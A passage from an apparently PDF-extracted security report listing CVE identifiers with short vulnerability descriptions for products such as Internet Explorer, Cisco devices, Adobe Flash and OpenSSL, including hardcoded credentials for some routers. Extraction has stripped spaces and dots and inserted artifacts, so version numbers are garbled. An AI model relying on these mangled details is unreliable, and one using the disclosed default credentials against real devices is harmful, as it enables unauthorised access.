CVE-2013-3199rdquoMicrosoft Internet Explorer 6 through10 allows remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted web site aka rdquordquoInternetExplorer Memory x000D CorruptionVulnerabilityrdquordquordquo
CVE-2013-3201rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3203 CVE-2013-3206 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3206
rdquoMicrosoft Internet Explorer 9 and 10allows remote attackers to x000D executearbitrary code or cause a denial ofservice (memory x000D corruption) via acrafted web site aka rdquordquoInternet ExplorerMemory x000D Corruption Vulnerabilityrdquordquoa different vulnerability than x000D CVE-2013-3201 CVE-2013-3203 CVE-2013-3207 and CVE-2013-3209rdquo
CVE-2013-3280EMC RSA Authentication Agent 71xbefore 712 for Web for Internet x000DInformation Services has a fail-open designwhich allows remote x000D attackers tobypass intended access restrictions viavectors that x000D trigger an agent crash
CVE-2013-3387Cisco Prime Central for HostedCollaboration Solution (HCS)Assurance x000D 86 and 9x before 92(1)allows remote attackers to cause a denialof x000D service (disk consumption) via aflood of TCP packets to port 5400 x000Dleading to large error-log files aka Bug IDCSCua42724
CVE-2013-3417The administrative web interface in CiscoVideo Surveillance Operations Managerdoes not properly perform authenticationwhich allows remote attackers to watchvideo feeds via a crafted URL aka BugID CSCtg72262
CVE-2013-3632The Cron service in rpcphp inOpenMediaVault allows remote x000Dauthenticated users to execute cron jobs asarbitrary users and x000D execute arbitrarycommands via the username parameter
CVE-2013-3656Cybozu Office 910 and earlier doesnot properly manage sessions x000Dwhich allows remote attackers to bypassauthentication by leveraging x000Dknowledge of a login URL
CVE-2013-3856rdquoMicrosoft Word 2003 SP3 and WordViewer allow remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted Office document akardquordquoWord Memory Corruption x000DVulnerabilityrdquordquordquo
CVE-2013-3860rdquoMicrosoft NET Framework 20 SP2 3535 SP1 351 4 and 45 does x000Dnot properly parse a DTD during XMLdigital-signature validation x000D whichallows remote attackers to cause adenial of service x000D (application crashor hang) via a crafted signed XMLdocument aka x000D rdquordquoEntity ExpansionVulnerabilityrdquordquordquo
CVE-2013-3893Use-after-free vulnerability in theSetMouseCapture implementationin x000D mshtmldll in MicrosoftInternet Explorer 6 through 11 allowsremote x000D attackers to executearbitrary code via crafted JavaScript stringsas x000D demonstrated by use of an ms-help URL that triggers loading of x000Dhxdsdll
CVE-2013-3897rdquoUse-after-free vulnerability in theCDisplayPointer class in mshtmldll in
Microsoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via crafted JavaScript code thatuses the onpropertychange event handleras exploited in the wild in September andOctober 2013 aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2013-3900rdquoThe WinVerifyTrust function in MicrosoftWindows XP SP2 and SP3 Windows Server2003 SP2 Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and Windows RTGold and 81 does not properly validate PEfile digests during Authenticode signatureverification which allows remote attackersto execute arbitrary code via a craftedPE file aka rdquordquoWinVerifyTrust SignatureValidation Vulnerabilityrdquordquordquo
CVE-2013-3905rdquoMicrosoft Outlook 2007 SP3 2010 SP1and SP2 2013 and 2013 RT does x000Dnot properly expand metadata containedin SMIME certificates which x000Dallows remote attackers to obtain sensitivenetwork configuration and x000D stateinformation via a crafted certificate in an e-mail message aka x000D rdquordquoSMIME AIAVulnerabilityrdquordquordquo
CVE-2013-4223The Gentoo Nullmailer package before 111-r2 uses world-readable x000D permissionsfor etcnullmailerremotes which allowslocal users to x000D obtain SMTPauthentication credentials by reading thefile
CVE-2013-4436The default configuration for salt-ssh inSalt (aka SaltStack) 0170 x000D doesnot validate the SSH host key of requestswhich allows remote x000D attackers tohave unspecified impact via a man-in-the-middle (MITM) x000D attack
CVE-2013-4478Sup before 01321 and 014x before01411 allows remote attackers x000Dto execute arbitrary commands via shellmetacharacters in the filename x000D ofan email attachment
CVE-2013-4529Buffer overflow in hwpcipcie aerc inQEMU before 172 allows x000D remoteattackers to cause a denial of service andpossibly execute x000D arbitrary code viaa large log num value in a savevm image
CVE-2013-4555Cross-site request forgery(CSRF) vulnerability in x000Decrireactionlogoutphp in SPIP before2124 allows remote attackers x000D tohijack the authentication of arbitrary usersfor requests that x000D logout the uservia unspecified vectors
CVE-2013-4776NETGEAR ProSafe GS724Tv3 andGS716Tv2 with firmware 54113and x000D earlier GS748Tv454114 and GS510TP 5044 allowsremote x000D attackers to cause adenial of service (reboot or crash) viaa crafted x000D HTTP request tofilesystem
CVE-2013-4782
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 21 of 28
The Supermicro BMC implementationallows remote attackers to bypass x000Dauthentication and execute arbitrary IPMIcommands by using cipher x000D suite 0(aka cipher zero) and an arbitrary password
CVE-2013-5057rdquohxdsdll in Microsoft Office 2007 SP3 and2010 SP1 and SP2 does not implementthe ASLR protection mechanism whichmakes it easier for remote attackers toexecute arbitrary code via a crafted COMcomponent on a web site that is visitedwith Internet Explorer as exploited in thewild in December 2013 aka rdquordquoHXDS ASLRVulnerabilityrdquordquordquo
CVE-2013-5369IBM SPSS Analytical Decision Management61 before IF1 62 before x000D IF1 and70 before FP1 IF6 might allow remoteattackers to execute x000D arbitrary codeby deploying and accessing a service
CVE-2013-5428IBM WebSphere DataPower XC10appliances 250 do not require x000Dauthentication for all administrative actionswhich allows remote x000D attackers tocause a denial of service via unspecifiedvectors
CVE-2013-5431Open redirect vulnerability in IBM TivoliFederated Identity Manager x000D(TFIM) 611 before IF 15 620 beforeIF 14 621 and 622 before x000D IF8 and Tivoli Federated Identity ManagerBusiness Gateway (TFIMBG) x000D 611before IF 15 620 before IF 14 621 and622 before IF 8 x000D allows remoteattackers to redirect users to arbitrary websites and x000D conduct phishing attacksvia unspecified vectors
CVE-2013-5494Cross-site request forgery (CSRF)vulnerability in the web framework x000Din Cisco Unified MeetingPlace Solution asused in Unified x000D MeetingPlace WebConferencing and Unified MeetingPlaceallows remote x000D attackers to hijackthe authentication of arbitrary usersaka Bug IDs x000D CSCui45209 andCSCui44674
CVE-2013-5507The IPsec implementation in Cisco AdaptiveSecurity Appliance (ASA) x000D Software91 before 91(17) when an IPsec VPNtunnel is enabled x000D allows remoteattackers to cause a denial of service (devicereload) x000D via a (1) ICMP or (2)ICMPv6 packet that is improperly handledduring x000D decryption aka Bug IDCSCue18975
CVE-2013-5536Cisco Secure Access Control System (ACS)does not properly implement x000D anincoming-packet firewall rule which allowsremote attackers to x000D cause a denialof service (process crash) via a floodof crafted x000D packets aka Bug IDCSCui51521
CVE-2013-5559Buffer overflow in the Active TemplateLibrary (ATL) framework in the x000DVPNAPI COM module in Cisco AnyConnectSecure Mobility Client 2x x000D allowsuser-assisted remote attackers to executearbitrary code via a x000D crafted HTMLdocument aka Bug ID CSCuj58139
CVE-2013-5561The Safe Search enforcement feature inCisco Adaptive Security x000D Appliance(ASA) CX Context-Aware SecuritySoftware does not properly x000D performfiltering which allows remote attackers tobypass intended x000D policy restrictionsvia unspecified vectors aka Bug IDCSCui94622
CVE-2013-5751Directory traversal vulnerability in SAPNetWeaver 7x allows remote x000Dattackers to read arbitrary files viaunspecified vectors
CVE-2013-5757Absolute path traversal vulnerability inYealink VoIP Phone SIP-T38G allowsremote authenticated users to readarbitrary files via a full pathname in thedumpConfigFile function in the commandparameter to cgi-bincgiServerexx
CVE-2013-5828Unspecified vulnerability in the EnterpriseManager Base Platform x000D componentin Oracle Enterprise Manager Grid ControlEM Base Platform x000D 10205 and11101 EM DB Control 11107 11202and 11203 x000D and EM Pluginfor DB 12102 and 12103 allowsremote attackers to x000D affect integrityvia unknown vectors related to StorageManagement
CVE-2013-6167Mozilla Firefox through 27 sends HTTPCookie headers without first x000Dvalidating that they have the requiredcharacter-set restrictions x000D whichallows remote attackers to conduct theequivalent of a x000D persistent LogoutCSRF attack via a crafted parameterthat forces a x000D web application toset a malformed cookie within an HTTPresponse
CVE-2013-6188Cross-site request forgery (CSRF)vulnerability in HP System x000DManagement Homepage (SMH) 71through 722 allows remote attackersto x000D hijack the authentication ofunspecified victims via unknown vectors
CVE-2013-6284rdquoUnspecified vulnerability in the StatutoryReporting for Insurance x000D (FS SR)component in the Financial Servicesmodule for SAP ERP Central x000DComponent (ECC) allows attackersto execute arbitrary code via x000Dunspecified vectors related to a rdquordquocodeinjection vulnerabilityrdquordquordquo
CVE-2013-6396The OpenStack Python client libraryfor Swift (python-swiftclient) 10 x000Dthrough 190 does not verify X509certificates from SSL servers x000D whichallows man-in-the-middle attackers tospoof servers and obtain x000D sensitiveinformation via a crafted certificate
CVE-2013-6475Multiple integer overflows in (1)OPVPOutputDevcxx and (2) x000DoprsOPVPSplashcxx in the pdftoopvpfilter in CUPS and cups-filters x000Dbefore 1047 allow remote attackers toexecute arbitrary code via a x000D craftedPDF file which triggers a heap-based bufferoverflow
CVE-2013-6660The drag-and-drop implementation inGoogle Chrome before 3301750117 doesnot properly restrict the information inWebDropData data structures which allowsremote attackers to discover full pathnamesvia a crafted web site
CVE-2013-6699The Control and Provisioning of WirelessAccess Points (CAPWAP) x000D protocolimplementation on Cisco Wireless LANController (WLC) devices x000D allowsremote attackers to cause a denial of servicevia a crafted x000D CAPWAP packet thattriggers a buffer over-read aka Bug IDCSCuh81880
CVE-2013-6702The management implementation on CiscoONS 15454 controller cards with x000Dsoftware 98 and earlier allows remoteattackers to cause a denial of x000Dservice (card reset) via crafted packets akaBug ID CSCtz50902
CVE-2013-6979The VTY authentication implementation inCisco IOS XE 0302xxSE and 0303xxSEincorrectly relies on the Linux-IOS internal-network configuration which allows remoteattackers to bypass authentication byleveraging access to a 192168x2 sourceIP address aka Bug ID CSCuj90227
CVE-2013-6994OpenText Exceed OnDemand (EoD) 8transmits the session ID in x000D cleartextwhich allows remote attackers to performsession fixation x000D attacks by sniffingthe network
CVE-2013-7004D-Link DSR-150 with firmware before108B44 DSR-150N with firmware before105B64 DSR-250 and DSR-250N withfirmware before 108B44 and DSR-500 DSR-500N DSR-1000 and DSR-1000N with firmware before 108B77have a hardcoded account of usernamegkJ9232xXyruTRmY which makes it easierfor remote attackers to obtain access byleveraging knowledge of the username
CVE-2013-7043Multiple cross-site request forgery (CSRF)vulnerabilities on Cisco x000D ScientificAtlanta DPR2320R2 routers with software202r1262-090417 x000D allow remoteattackers to hijack the authentication ofadministrators x000D for requests that(1) change a password via the Passwordparameter to x000D goformRgSecurity(2) reboot the device via the Restartparameter to x000D goformrestart (3)modify Wi-Fi settings as demonstratedby the x000D WpaPreSharedKeyparameter to goformwlanSecurity or(4) modify x000D parental controls viathe ParentalPassword parameter to x000DgoformRgParentalBasic
CVE-2013-7389Multiple cross-site scripting (XSS)vulnerabilities in D-Link DIR-645 Router(Rev A1) with firmware before 104B11allow remote attackers to inject arbitraryweb script or HTML via the (1) deviceidparameter to parentalcontrolsbindphp(2) RESULT parameter to infophp or (3)receiver parameter to bsc sms sendphp
CVE-2014-0001Buffer overflow in clientmysqlcc in Oracle
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 22 of 28
MySQL and MariaDB before 5535 allowsremote database servers to cause a denialof service (crash) and possibly executearbitrary code via a long server versionstring
CVE-2014-0035The SymmetricBinding in Apache CXFbefore 2613 and 27x before 2710when EncryptBeforeSigning is enabledand the UsernameToken policy is set toan EncryptedSupportingToken transmitsthe UsernameToken in cleartext whichallows remote attackers to obtain sensitiveinformation by sniffing the network
CVE-2014-0160The (1) TLS and (2) DTLSimplementations in OpenSSL 101 before101g do not properly handle HeartbeatExtension packets which allows remoteattackers to obtain sensitive informationfrom process memory via crafted packetsthat trigger a buffer over-read asdemonstrated by reading private keysrelated to d1 bothc and t1 libc aka theHeartbleed bug
CVE-2014-0207The cdf read short sector function in cdfcin file before 519 as used in the Fileinfocomponent in PHP before 5430 and 55xbefore 5514 allows remote attackers tocause a denial of service (assertion failureand application exit) via a crafted CDF file
CVE-2014-0259rdquoMicrosoft Word 2007 SP3 and OfficeCompatibility Pack SP3 allow remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted Office document aka rdquordquoWordMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-0266rdquoThe XMLHTTP ActiveX controls in XMLCore Services 30 in Microsoft WindowsXP SP2 and SP3 Windows Server 2003SP2 Windows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RT Goldand 81 allow remote attackers to bypass theSame Origin Policy via a web page that isvisited in Internet Explorer aka rdquordquoMSXMLInformation Disclosure Vulnerabilityrdquordquordquo
CVE-2014-0294rdquoMicrosoft Forefront Protection 2010for Exchange Server does not properlyparse e-mail content which might allowremote attackers to execute arbitrarycode via a crafted message aka rdquordquoRCEVulnerabilityrdquordquordquo
CVE-2014-0313rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-0321rdquo
CVE-2014-0354The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 100(BFQ6)C0has a hardcoded password of qweasdzxcfor an unspecified account which allowsremote attackers to obtain indexasp loginaccess via an HTTP request
CVE-2014-0362Cross-site scripting (XSS) vulnerability
on Google Search Appliance (GSA)devices before 7014G216 and 72 before720G114 when dynamic navigation isconfigured allows remote attackers to injectarbitrary web script or HTML via inputincluded in a SCRIPT element
CVE-2014-0433Unspecified vulnerability in the MySQLServer component in Oracle MySQL 5613and earlier allows remote attackers to affectavailability via unknown vectors related toThread Pooling
CVE-2014-0488rdquoAPT before 109 does not rdquordquoinvalidaterepository datardquordquo when moving from anunauthenticated to authenticated statewhich allows remote attackers to haveunspecified impact via crafted repositorydatardquo
CVE-2014-0493Adobe Reader and Acrobat 10x before1019 and 11x before 11006 on Windowsand Mac OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-0495
CVE-2014-0494Adobe Digital Editions 201 allowsattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via unspecified vectors
CVE-2014-0498Stack-based buffer overflow in AdobeFlash Player before 117700269 and118x through 120x before 120070on Windows and Mac OS X and before112202341 on Linux Adobe AIR before4001628 on Android Adobe AIR SDKbefore 4001628 and Adobe AIR SDK ampCompiler before 4001628 allows attackersto execute arbitrary code via unspecifiedvectors
CVE-2014-0515Buffer overflow in Adobe Flash Playerbefore 117700279 and 118x through130x before 1300206 on Windows andOS X and before 112202356 on Linuxallows remote attackers to execute arbitrarycode via unspecified vectors as exploitedin the wild in April 2014
CVE-2014-0533Cross-site scripting (XSS) vulnerability inAdobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allows remoteattackers to inject arbitrary web script orHTML via unspecified vectors a differentvulnerability than CVE-2014-0531 and CVE-2014-0532
CVE-2014-0536Adobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allow attackersto execute arbitrary code or cause a denial ofservice (memory corruption) via unspecifiedvectors
CVE-2014-0562rdquoCross-site scripting (XSS) vulnerability in
Adobe Reader and Acrobat 10x before10112 and 11x before 11009 on OS Xallows remote attackers to inject arbitraryweb script or HTML via unspecified vectorsaka rdquordquoUniversal XSS (UXSS)rdquordquordquo
CVE-2014-0577rdquoAdobe Flash Player before 1300252and 14x and 15x before 1500223 onWindows and OS X and before 112202418on Linux Adobe AIR before 1500356Adobe AIR SDK before 1500356 andAdobe AIR SDK amp Compiler before1500356 allow attackers to executearbitrary code by leveraging an unspecifiedrdquordquotype confusionrdquordquo a different vulnerabilitythan CVE-2014-0584 CVE-2014-0585CVE-2014-0586 and CVE-2014-0590rdquo
CVE-2014-0765Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along GotoCmd argument
CVE-2014-0767Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along AccessCode argument
CVE-2014-0783Stack-based buffer overflow inBKHOdeqexe in Yokogawa CENTUMCS 3000 R30950 and earlier allows remoteattackers to execute arbitrary code via acrafted TCP packet
CVE-2014-1330WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1342WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1349Use-after-free vulnerability in Safari inApple iOS before 712 allows remoteattackers to execute arbitrary code or causea denial of service (application crash) viaan invalid URL
CVE-2014-1356Heap-based buffer overflow in launchdin Apple iOS before 712 Apple OS Xbefore 1094 and Apple TV before 612allows attackers to execute arbitrary codevia a crafted application that sends IPCmessages
CVE-2014-1370The byte-swapping implementation incopyfile in Apple OS X before 1094 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsmemory access and application crash) via acrafted AppleDouble file in a ZIP archive
CVE-2014-1379Graphics Drivers in Apple OS X before1094 allows attackers to gain privilegesor cause a denial of service (NULL pointerdereference and system crash) via a 32-bit
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 23 of 28
executable file for a crafted application
CVE-2014-1382WebKit as used in Apple iOS before712 Apple Safari before 615 and 7xbefore 705 and Apple TV before 612allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption and application crash) via acrafted web site a different vulnerabilitythan other WebKit CVEs listed in APPLE-SA-2014-06-30-1 APPLE-SA-2014-06-30-3 and APPLE-SA-2014-06-30-4
CVE-2014-1466SQL injection vulnerability in CSP MySQLUser Manager 23 allows remote attackersto execute arbitrary SQL commands via thelogin field of the login page
CVE-2014-1472Multiple cross-site scripting (XSS)vulnerabilities in the Enterprise Managerin McAfee Vulnerability Manager (MVM)755 and earlier allow remote attackers toinject arbitrary web script or HTML viaunspecified vectors
CVE-2014-1477Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before270 Firefox ESR 24x before 243Thunderbird before 243 and SeaMonkeybefore 224 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1518Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before290 Firefox ESR 24x before 245Thunderbird before 245 and SeaMonkeybefore 226 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1563Use-after-free vulnerability in themozillaDOMSVGLengthGetTearOfffunction in Mozilla Firefox before 320Firefox ESR 31x before 311 andThunderbird 31x before 311 allows remoteattackers to execute arbitrary code orcause a denial of service (heap memorycorruption) via an SVG animation withDOM interaction that triggers incorrectcycle collection
CVE-2014-1565The mozilladomAudioEventTimelinefunction in the Web Audio APIimplementation in Mozilla Firefox before320 Firefox ESR 31x before 311 andThunderbird 31x before 311 does notproperly create audio timelines whichallows remote attackers to obtain sensitiveinformation from process memory or causea denial of service (out-of-bounds read) viacrafted API calls
CVE-2014-1586contentbasesrcnsDocumentcpp inMozilla Firefox before 330 Firefox ESR31x before 312 and Thunderbird 31xbefore 312 does not consider whetherWebRTC video sharing is occurring whichallows remote attackers to obtain sensitiveinformation from the local camera in certainIFRAME situations by maintaining a sessionafter the user temporarily navigates away
CVE-2014-1701
The GenerateFunction function inbindingsscriptscode generator v8pmin Blink as used in Google Chrome before3301750149 does not implement acertain cross-origin restriction for theEventTargetdispatchEvent functionwhich allows remote attackers to conductUniversal XSS (UXSS) attacks via vectorsinvolving events
CVE-2014-1740Multiple use-after-free vulnerabilities innetwebsocketswebsocket jobcc in theWebSockets implementation in GoogleChrome before 3401847137 allow remoteattackers to cause a denial of service orpossibly have unspecified other impact viavectors related to WebSocketJob deletion
CVE-2014-1744Integer overflow in the AudioInputRendererHostOnCreateStream functionin contentbrowserrendererhostmediaaudio input renderer hostccin Google Chrome before 3501916114allows remote attackers to cause a denial ofservice or possibly have unspecified otherimpact via vectors that trigger a largeshared-memory allocation
CVE-2014-1753rdquoMicrosoft Internet Explorer 6 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-1806rdquoThe NET Remoting implementation inMicrosoft NET Framework 11 SP120 SP2 35 351 4 45 and451 does not properly restrict memoryaccess which allows remote attackers toexecute arbitrary code via vectors involvingmalformed objects aka rdquordquoTypeFilterLevelVulnerabilityrdquordquordquo
CVE-2014-1808rdquoMicrosoft Office 2013 Gold SP1 RTand RT SP1 allows remote attackers toobtain sensitive token information via aweb site that sends a crafted responseduring opening of an Office document akardquordquoToken Reuse Vulnerabilityrdquordquordquo
CVE-2014-1811rdquoThe TCP implementation in MicrosoftWindows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RTGold and 81 allows remote attackers tocause a denial of service (non-paged poolmemory consumption and system hang) viamalformed data in the Options field of aTCP header aka rdquordquoTCP Denial of ServiceVulnerabilityrdquordquordquo
CVE-2014-1812rdquoThe Group Policy implementation inMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows7 SP1 Windows 8 Windows 81 andWindows Server 2012 Gold and R2 does notproperly handle distribution of passwordswhich allows remote authenticated users toobtain sensitive credential information andconsequently gain privileges by leveragingaccess to the SYSVOL share as exploited inthe wild in May 2014 aka rdquordquoGroup PolicyPreferences Password Elevation of PrivilegeVulnerabilityrdquordquordquo
CVE-2014-2014imapsync before 1584 when running withthe ndashtls option attempts a cleartext loginwhen a certificate verification failure occurswhich allows remote attackers to obtaincredentials by sniffing the network
CVE-2014-2103Cisco Intrusion Prevention System (IPS)Software allows remote attackers to cause adenial of service (MainApp process outage)via malformed SNMP packets aka Bug IDsCSCum52355 and CSCul49309
CVE-2014-2109The TCP Input module in Cisco IOS122 through 124 and 150 through 154when NAT is used allows remote attackersto cause a denial of service (memoryconsumption or device reload) via craftedTCP packets aka Bug IDs CSCuh33843and CSCuj41494
CVE-2014-2364Multiple stack-based buffer overflows inAdvantech WebAccess before 72 allowremote attackers to execute arbitrary codevia a long string in the (1) ProjectName(2) SetParameter (3) NodeName(4) CCDParameter (5) SetColor (6)AlarmImage (7) GetParameter (8)GetColor (9) ServerResponse (10)SetBaud or (11) IPAddress parameterto an ActiveX control in (a) webvactocx(b) dvsocx or (c) webdactocx
CVE-2014-2416Unspecified vulnerability in the OracleData Integrator component in OracleFusion Middleware 111130 allows remoteattackers to affect availability via unknownvectors related to Data Quality a differentvulnerability than CVE-2014-2407 CVE-2014-2415 CVE-2014-2417 and CVE-2014-2418
CVE-2014-2554OTRS 31x before 3121 32x before3216 and 33x before 336 allows remoteattackers to conduct clickjacking attacks viaan IFRAME element
CVE-2014-2643Unspecified vulnerability in HP SystemsInsight Manager (SIM) before 74 allowsremote authenticated users to gainprivileges via unknown vectors
CVE-2014-2742rdquoIsode M-Link before 160v7 does notproperly restrict the processing ofcompressed XML elements which allowsremote attackers to cause a denial of service(resource consumption) via a crafted XMPPstream aka an rdquordquoxmppbombrdquordquo attackrdquo
CVE-2014-2768rdquoMicrosoft Internet Explorer 6 through 8allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2773rdquo
CVE-2014-2789rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2795 CVE-2014-2798 andCVE-2014-2804rdquo
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 24 of 28
CVE-2014-2791rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted web site aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-2794rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2788rdquo
CVE-2014-2808rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2796 CVE-2014-2825CVE-2014-4050 CVE-2014-4055 and CVE-2014-4067rdquo
CVE-2014-2821rdquoMicrosoft Internet Explorer 8 and 9 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-3444The GetGUID function in codecsdmp4dllin RealNetworks RealPlayer 160351 andearlier allows remote attackers to executearbitrary code or cause a denial of service(write access violation and applicationcrash) via a malformed 3gp file
CVE-2014-3489libutilmiq-passwordrb in Red HatCloudForms 30 Management Engine(CFME) before 5242 uses a hard-codedsalt which makes it easier for remoteattackers to guess passwords via a bruteforce attack
CVE-2014-3507Memory leak in d1 bothc in the DTLSimplementation in OpenSSL 098 before098zb 100 before 100n and 101before 101i allows remote attackersto cause a denial of service (memoryconsumption) via zero-length DTLSfragments that trigger improper handling ofthe return value of a certain insert function
CVE-2014-3556rdquoThe STARTTLS implementation inmailngx mail smtp handlerc in the SMTPproxy in nginx 15x and 16x before 161and 17x before 174 does not properlyrestrict IO buffering which allows man-in-the-middle attackers to insert commandsinto encrypted SMTP sessions by sending acleartext command that is processed afterTLS is in place related to a rdquordquoplaintextcommand injectionrdquordquo attack a similar issueto CVE-2011-0411rdquo
CVE-2014-3580The mod dav svn Apache HTTPD servermodule in Apache Subversion 1x before1719 and 18x before 1811 allows remoteattackers to cause a denial of service (NULLpointer dereference and server crash) via aREPORT request for a resource that doesnot exist
CVE-2014-3814
The Juniper Networks NetScreen Firewalldevices with ScreenOS before 63r17 whenconfigured to use the internal DNS lookupclient allows remote attackers to cause adenial of service (crash and reboot) viaa sequence of malformed packets to thedevice IP
CVE-2014-3819Juniper Junos 114 before 114R12 121before 121R10 121X44 before 121X44-D35 121X45 before 121X45-D25121X46 before 121X46-D20 121X47before 121X47-D10 122 before 122R8123 before 123R7 131 before 131R4132 before 132R4 133 before 133R2and 141 before 141R1 when Auto-RP isenabled allows remote attackers to causea denial of service (RDP routing processcrash and restart) via a malformed PIMpacket
CVE-2014-3872Multiple SQL injection vulnerabilities inthe administration login page in D-LinkDAP-1350 (Rev A1) with firmware114 and earlier allow remote attackers toexecute arbitrary SQL commands via the(1) username or (2) password
CVE-2014-4044OpenAFS 168 does not properly clear thefields in the host structure which allowsremote attackers to cause a denial of service(uninitialized memory access and crash)via unspecified vectors related to TMAYrequests
CVE-2014-4079rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090 CVE-2014-4094CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4082rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4100rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory
